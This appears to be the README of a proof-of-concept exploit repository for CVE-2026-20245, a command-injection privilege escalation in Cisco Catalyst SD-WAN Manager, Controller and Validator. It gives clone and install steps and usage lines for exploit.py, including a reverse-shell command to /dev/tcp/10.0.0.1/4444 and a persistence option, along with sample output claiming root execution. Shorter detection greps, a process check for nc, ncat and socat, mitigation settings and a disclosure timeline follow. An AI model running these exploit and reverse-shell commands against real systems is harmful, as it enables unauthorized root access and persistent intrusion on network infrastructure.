
**このコードは教育目的および許可されたセキュリティテスト専用です。**
このコードは教育目的および許可されたセキュリティテストのみを対象としています。
CVE-2026-20245 は、Cisco Catalyst SD-WAN Controller (vSmart)、Cisco Catalyst SD-WAN Manager (vManage)、Cisco Catalyst SD-WAN Validator (vBond) の CLI における 権限昇格 の脆弱性です。認証された netadmin 権限を持つ攻撃者が、特別に細工されたファイルをアップロードすることで、root として任意のコマンドを実行できる可能性があります。
| フィールド | 値 |
|---|---|
| CVE | CVE-2026-20245 |
| CVSS | 7.8 (High) |
| ベクター | AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| コンポーネント | CLI / CSV Upload |
| タイプ | Command Injection (CWE-116) |
| 製品 | 脆弱なバージョン |
|---|---|
| Cisco Catalyst SD-WAN Manager | < 20.18.3.1 |
| Cisco Catalyst SD-WAN Controller (vSmart) | < 20.18.3.1 |
| Cisco Catalyst SD-WAN Validator (vBond) | < 20.18.3.1 |
# Clonar repositorio
git clone https://github.com/username/CVE-2026-20245-PoC
cd CVE-2026-20245-PoC
# Instalar dependencias
pip install -r requirements.txt
# Dar permisos
chmod +x exploit.py
📦 依存関係
requests>=2.31.0
python3 exploit.py -t 192.168.1.1 -u netadmin -p password --check-only
python3 exploit.py -t 192.168.1.1 -u netadmin -p password -c "id"
python3 exploit.py -t 192.168.1.1 -u netadmin -p password -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"
python3 exploit.py -t 192.168.1.1 -u netadmin -p password -c "whoami" --persist
╔═══════════════════════════════════════════════════════════════════╗
║ CVE-2026-20245 - Cisco SD-WAN Privilege Escalation Exploit ║
║ Command Injection via Crafted File Upload ║
║ CVSS: 7.8 (High) | CISA KEV: 2026-06-09 ║
╚═══════════════════════════════════════════════════════════════════╝
[*] Authenticating to 192.168.1.1...
[+] Authentication successful
[+] XSRF Token obtained
[*] Attempting to execute: id
[*] Trying endpoint: /system/device/upload
[*] Uploading malicious file...
[+] File uploaded successfully
[*] Triggering command injection...
[+] Trigger response: 200
[+] Command injection successful via /system/device/upload
============================================================
[✓] EXPLOIT SUCCESSFUL
[✓] Command executed as root
[!] System is VULNERABLE - Apply Cisco patch immediately
============================================================
# Buscar actividad sospechosa
grep -E "\.csv|malicious|upload_serial" /var/log/scripts.log
# Comandos específicos a buscar
Apr 15 09:44:57 vmanage vScript: /usr/bin/vconfd_script_upload_tenant_list.sh -cli path /home/admin/malicious.csv
# Buscar procesos root inusuales
ps aux | grep -E "bash|sh|nc|ncat|socat"
| バージョン | 修正リリース |
|---|---|
| 20.18.2.1 およびそれ以前 | 20.18.3.1 |
# Deshabilitar upload de serial numbers si no es necesario
no feature upload-serial-numbers
# Limitar privilegios netadmin
admin privilege restrict
| 日付 | イベント |
|---|---|
| 2026-05-14 | Cisco が最初のアドバイザリを公開 |
| 2026-06-04 | CVE が正式に公開 |
| 2026-06-09 | CISA が KEV に追加 |
| 2026-06-23 | CISA のパッチ適用期限 |
このソフトウェアは「現状のまま」提供され、いかなる保証もありません。著者は不正使用について一切の責任を負いません。許可されたシステムでのみ使用してください。